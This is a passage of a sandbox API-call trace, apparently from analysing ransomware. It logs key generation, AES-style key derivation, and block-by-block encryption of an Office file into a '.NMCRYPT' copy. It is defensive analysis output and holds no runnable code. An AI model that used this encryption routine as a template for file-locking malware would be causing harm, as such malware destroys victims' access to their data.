pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.107] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0162.107] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0162.108] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0162.108] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.108] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad7f8) returned 1 [0162.108] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0162.108] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0162.108] wcslen (_String="\\\\?\\") returned 0x4 [0162.108] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad478) returned 1 [0162.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0162.113] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=639151) returned 1 [0162.113] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0162.113] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.128] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.128] GetLastError () returned 0x0 [0162.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.184] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.185] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.185] GetLastError () returned 0x0 [0162.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.185] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.186] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.186] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.186] GetLastError () returned 0x0 [0162.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.187] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.187] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.187] GetLastError () returned 0x0 [0162.187] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.187] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.187] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.187] GetLastError () returned 0x0 [0162.187] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.187] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.239] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.239] GetLastError () returned 0x0 [0162.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.239] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.239] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.239] GetLastError () returned 0x0 [0162.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.239] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.240] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.240] GetLastError () returned 0x0 [0162.240] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.240] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.240] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.240] GetLastError () returned 0x0 [0162.240] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.240] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.240] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.240] GetLastError () returned 0x0 [0162.240] WriteFile (in: hFile=0x588, 